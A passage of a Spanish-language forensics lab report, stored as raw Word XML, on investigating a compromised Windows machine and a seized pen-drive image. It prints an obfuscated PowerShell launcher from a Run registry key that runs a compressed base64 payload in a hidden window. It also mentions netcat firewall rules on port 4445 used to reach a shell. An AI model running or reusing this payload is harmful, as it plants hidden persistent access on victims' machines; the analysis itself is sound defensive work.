      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>scriptblock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>((New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>System.IO.StreamReader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>(New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>System.IO.Compression.GzipStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>((New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4s{1}AM+K{2}2MCA7VWbW+bSBD+Xqn/AVWWA{1}kY/HJtEqnSATYxSXCc4HfXOhFY460X1oEljtvrf79ZDLGjOr3cS''+''UWKArszs7PPPPOMF1nsM0xj{1}''+''WmMhe/v3wnF0/MSLxKkSuhobUWoLJ9''+''8eb9ZYadj90L4LEgzfb1u0cjD8fz83M{2}SBMVs9129QExPUxTdE4xSSRb+FkZLlKCTm/uv{2}GfCd6H{2}V/WC0HuPFGZb0/OXSDjR44DvXVPf45lV3''+''TXBTBK/fBHl2UltXm0/Z''+''B5JJdHdpgxF1YAQURZ+{2}''+''PzA/naNJNHBfkJTumDVEY4''+''b9eogTr0F6kK0R+QgtqRBKsJt9vdJEMuSuLgWj7OzkkR47SXU14MgQWkqKs''+''KMnzCbz/+UZsXxd1nMc{1}SqdsxQQtcuSh6xj9Jqx4sDgu7QYg5eLktwHM5lGcwe6QpJlTgjRBH+SxipizYleG91kg6dwKrHE''+''lmBqh''+''67qEODjKCdq3gk05wKMjwFHQDBHxzERckgsmrGjSMc2i+Uz{2}zfQZC01KMpzr0/C5oiOHC6x2i{2}hc9KP8mQPH+GXKis+8pbY9VKR3B7vBxsKKzNhhQH832EFxSoRC1u8jqdW2iBY9Taxl6E/ZKx0rGioAVBOSLV0qwLCUpisYGCFi{1}o9BhHmXPjJ7d2hNmzr5FhEqBE96GwKWQFNZdfJrMrnCTasYMiwG73DWStLKBPUGld9Ma2PJ1/g5FoEi9NFaGXQaP6iuAij6BAEfQ4xcWWnjGav4r7dJ2MMOx7KSvDzeUXYBaHmjROWZL5UFMAoO+ukY89wvFQhA4OkLF1cVgeLh5Fw/Q{1}geaBS{1}9QDVjhKLiMM{2}WBP{1}EVctVFz{1}7WBEVgkYuGRbwQJKJokJxYXogC''+''8WiSZRPsGM8xKcE4SBEK''+''7RLKFGG{1}EwYCxPHNmfU/UvhZeSAXM0FFVaS{2}tWbGlnHqV1h7w9lZgJNDkTCAwUpoZHgp+tjcKYz0Qb3BPR2eSavjTm3mOnZMcM124G/Q+hRcXX7tqLhhU8c3096FdarjTbjxT7u6H1wG6MwdNpnbtpnZ0zu3WDOaS9/Q+vl7OBnYbG''+''Lrnf7SJ1qv1VHdSarhTWfk+C3j26aeAkebzc5Y0xuN5k1DWwF2E1wLV3rQjfDm6RreQUpvrg07NTSbtC/Nu/tR3ZqOSEdtWsvFiKbux0lLVdWzwGs5W103a''+''NBwtuPaHe13/MhoxlQ9M5srva3rZtweWga9mhiJ3lOHXrimZqibRj00we0Ko+ntwDJub{2}1DH1x8fWidqaF6Nhp7S2M0rOPpen{2}3hG9r07l1VK1pB+iJnl6P8PCRxz{1}eDGs69vTr6dZS1dokrXsrg+oGAGtNH/SL5WRt9Qj49wd1qg9Jd29722ld+dPap9T5/AHqOBvgmDXq88p{2}2864{2}L1/V0mHfzB8UM/XZN''+''zxknTpEagz{2}HPZZxZNrEJxexRzD0nis3uFkhgRmHYwD0uO6oRQnwv+Tpph2uxmAB9JAzvP69ibLDwb{2}vtBUC6dn08hS2A9kLJ6jeKQLRXtqaFpoN/ak9bM+f32q5l0v''+''ZV4L''+''{1}UPgB02RXCSB4d4eCF{1}0m9HC{2}Y9A83''+''5BV6vQQdnr0AnQLR27csBNCglh/CVN3s''+''mxAF8gFsNLj/jYz4nCkQ4</w:t>
      </w:r>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>QQ+AAh+Bh{2}O18q3WfAh/K3cKHVrCv+BfubNf+8Xum/ikKQVCP62/XDhQ8N+HwcjDDAxdkFSCduP9FSiKjjmoc14h6{1}hF8fBfvjcZO+nC76hc1/8B5XG1OHMLAAA{0}'')-f''='',''I'',''y'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327CC50F" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9"/>
    <w:p w14:paraId="77A09B4D" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t>En el registro anterior en Run, puedo ver como ejecuta ese elemento en BASE64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772C46B" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="0084442C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C0BDD5" wp14:editId="0D3F629C">
            <wp:extent cx="5400040" cy="292354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923540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C6591" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRPr="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C1871B" w14:textId="4CB0211A" w:rsidR="000A3E5D" w:rsidRPr="00227A5A" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Otra característica importante a tener en cuenta serían los procesos, ¿hay algún proceso que sea sospechoso de que se ha sufrido un ataque? Tras su localización, investiga cómo se ha podido conseguir lanzar este proceso encontrando las modificaciones del sistema que han hecho posible la creación de este proceso con el arranque de la máquina. (Análisis del registro, posibles ficheros en alguna ubicación del disco, reglas de entrada de firewall). (Extra, no solicitado en la práctica: Puedes intentar realizar una prueba de conexión hacia esta máquina para comprobar la “puerta abierta”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E7E059" w14:textId="77777777" w:rsidR="00733DD9" w:rsidRDefault="00733DD9" w:rsidP="000A3E5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA130D1" w14:textId="77777777" w:rsidR="00733DD9" w:rsidRDefault="00733DD9" w:rsidP="00733DD9">
      <w:r>
        <w:t>Compruebo las reglas de firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33690CDC" w14:textId="09BD2EBC" w:rsidR="000A3E5D" w:rsidRDefault="00733DD9" w:rsidP="00733DD9">
      <w:r w:rsidRPr="00733DD9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2C425D" wp14:editId="185B3B13">
            <wp:extent cx="5400040" cy="29121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912110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000A3E5D">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6A0F0" w14:textId="0F310CB8" w:rsidR="007520B2" w:rsidRDefault="007520B2" w:rsidP="00733DD9">
      <w:r>
        <w:t xml:space="preserve">Veo que hay </w:t>
      </w:r>
      <w:r w:rsidR="00935841">
        <w:t xml:space="preserve">varias de nc.exe y de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00935841">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00935841">
        <w:t xml:space="preserve"> veo que tiene un puerto específico, el puerto </w:t>
      </w:r>
      <w:r w:rsidR="00935841" w:rsidRPr="00935841">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4445</w:t>
      </w:r>
      <w:r w:rsidR="00935841">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1B859" w14:textId="4966700D" w:rsidR="00031876" w:rsidRDefault="00031876" w:rsidP="00733DD9">
      <w:r>
        <w:t xml:space="preserve">Ejecuto un escaneo desde una VM Kali Linux y vemos que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> abierto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E56D93" w14:textId="7D120E0F" w:rsidR="00031876" w:rsidRDefault="00031876" w:rsidP="00733DD9">
      <w:r w:rsidRPr="00031876">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="173EFE6B" wp14:editId="076F0292">
            <wp:extent cx="5400040" cy="293751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937510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B26024" w14:textId="38A76436" w:rsidR="00031876" w:rsidRDefault="00031876" w:rsidP="00733DD9">
      <w:r>
        <w:t>Realizo una revers</w:t>
      </w:r>
      <w:r w:rsidR="00702864">
        <w:t>e S</w:t>
      </w:r>
      <w:r>
        <w:t>hell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38475037" w14:textId="7F921A94" w:rsidR="00031876" w:rsidRDefault="00031876" w:rsidP="00733DD9">
      <w:r w:rsidRPr="00031876">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595E5F68" wp14:editId="697430C7">
            <wp:extent cx="5400040" cy="29044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904490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23129927" w14:textId="72527594" w:rsidR="00031876" w:rsidRDefault="00031876" w:rsidP="00733DD9">
      <w:r>
        <w:t>Y ya tengo acceso a la VM, con lo que se comprueba que esa regla abre el puerto y podemos acceder desde fuera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607599B0" w14:textId="77777777" w:rsidR="00031876" w:rsidRDefault="00031876" w:rsidP="00733DD9"/>
    <w:p w14:paraId="601F2152" w14:textId="20227ACB" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc219084520"/>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>Apartado 3: Análisis del pen de datos requisado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="65CD9230" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D"/>
    <w:p w14:paraId="254E38FB" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Realiza un análisis de los datos encontrados en el pen drive que se le cayó a la persona atacante en el momento de su huida. Pasado un tiempo se ha detectado que en la máquina infectada falta un documento llamado “Fórmula de la felicidad.docx”, por lo que el objetivo principal de este análisis es intentar demostrar que este fichero fue sustraído y se encuentra en alguna ubicación en el pen de datos, aunque puede que no sea tan evidente su localización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ECC821" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>En este caso se provee de una imagen del dispositivo que ha sido extraída con “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GuyManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”. Además de esta imagen, se incluye un fichero con su firma HASH para poder comprobar la integridad de la imagen descargada. El enlace a estos ficheros es el mismo del apartado anterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC676C0" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Imagen del pen de datos: datosPen.E01</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Fichero con la firma HASH: hashDatosPen.sha1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC678A5" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">*Nota: Para este análisis se puede usar cualquier herramienta de análisis de imágenes, aunque se recomienda el uso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Autopsy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Para la comprobación del HASH de la imagen se puede usar la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>QuickHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Estas herramientas se pueden instalar en Windows o se pueden usar desde distribuciones Linux estándar en las que se deberían instalar o en distribuciones Linux especializadas como Kali Linux o CAINE. La versión de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Autopsy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> incorporada en Kali Linux es bastante antigua, pero es funcional. La elección del software a usar es libre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F240F" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Sobre la imagen proporcionada realiza las siguientes acciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE756A6" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF3FA3E" w14:textId="44EA4701" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261507">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descarga de la imagen y comprobación de la integridad de esta imagen mediante la comprobación de su hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2CB33" w14:textId="509E6899" w:rsidR="00261507" w:rsidRDefault="00261507" w:rsidP="00261507">
      <w:r>
        <w:t>Me descargo la imagen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F8A8C" w14:textId="1533AA64" w:rsidR="00261507" w:rsidRDefault="00261507" w:rsidP="00261507">
      <w:r w:rsidRPr="00261507">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D2F444" wp14:editId="0AADF2E3">
            <wp:extent cx="5400040" cy="28981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898140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C8788" w14:textId="33885801" w:rsidR="006348D6" w:rsidRDefault="006348D6" w:rsidP="00261507"/>
    <w:p w14:paraId="10A4F1E9" w14:textId="40F68527" w:rsidR="006348D6" w:rsidRDefault="006348D6" w:rsidP="00261507">
      <w:r>
        <w:t>Compruebo el hash de la imagen y lo comparo con el hash, coincide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5F03C1" w14:textId="2BB16B32" w:rsidR="006348D6" w:rsidRDefault="006348D6" w:rsidP="00261507">
      <w:r w:rsidRPr="006348D6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="188CB990" wp14:editId="00AA0965">
            <wp:extent cx="5400040" cy="29165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916555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A17D5" w14:textId="112128D6" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00261507"/>
    <w:p w14:paraId="40286725" w14:textId="77777777" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00261507"/>
    <w:p w14:paraId="59008A7A" w14:textId="68F9B27C" w:rsidR="006348D6" w:rsidRDefault="006348D6" w:rsidP="00261507"/>
    <w:p w14:paraId="4E413D9A" w14:textId="77777777" w:rsidR="006348D6" w:rsidRPr="00261507" w:rsidRDefault="006348D6" w:rsidP="00261507"/>
    <w:p w14:paraId="69D3F17D" w14:textId="203CAE2F" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006348D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis de la imagen del pen de modo que compruebes si existe algún fichero que está corrompido, por lo que se ha podido modificar algún dato de los valores de sus cabeceras y ser ilegibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F2F7EC" w14:textId="4B20BBFB" w:rsidR="00EF181B" w:rsidRDefault="00EF181B" w:rsidP="00EF181B">
      <w:r>
        <w:t xml:space="preserve">Abro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Autopsy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y entro desde la URL:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EF181B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7052815D" wp14:editId="6405BC96">
            <wp:extent cx="5400040" cy="2910205"/>
            <wp:effectExtent l="0" t="0" r="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910205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D85ED4" w14:textId="4A7B402C" w:rsidR="00EF181B" w:rsidRDefault="00EF181B" w:rsidP="00EF181B"/>
    <w:p w14:paraId="68E20796" w14:textId="10AA4363" w:rsidR="00EF181B" w:rsidRDefault="00EF181B" w:rsidP="00EF181B">
      <w:r>
        <w:t>Creo un nuevo caso, relleno los datos que me solicitan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE7D9D8" w14:textId="263EE0FE" w:rsidR="00EF181B" w:rsidRDefault="00EF181B" w:rsidP="00EF181B">
      <w:r w:rsidRPr="00EF181B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C613DC" wp14:editId="59742C3D">
            <wp:extent cx="5400040" cy="290258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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A3DD3" w14:textId="3CDB2D6B" w:rsidR="00EF181B" w:rsidRDefault="00EF181B" w:rsidP="00EF181B">
      <w:r>
        <w:t>Analizo la imagen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A3797" w14:textId="1DE0A098" w:rsidR="00EF181B" w:rsidRDefault="00EF181B" w:rsidP="00EF181B">
      <w:r w:rsidRPr="00EF181B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53002B4D" wp14:editId="1298902C">
            <wp:extent cx="5400040" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="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872740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7DAC01" w14:textId="4DBDC50B" w:rsidR="003E29B4" w:rsidRDefault="003E29B4" w:rsidP="00EF181B">
      <w:r>
        <w:t xml:space="preserve">Ejecuto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Extract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y File </w:t>
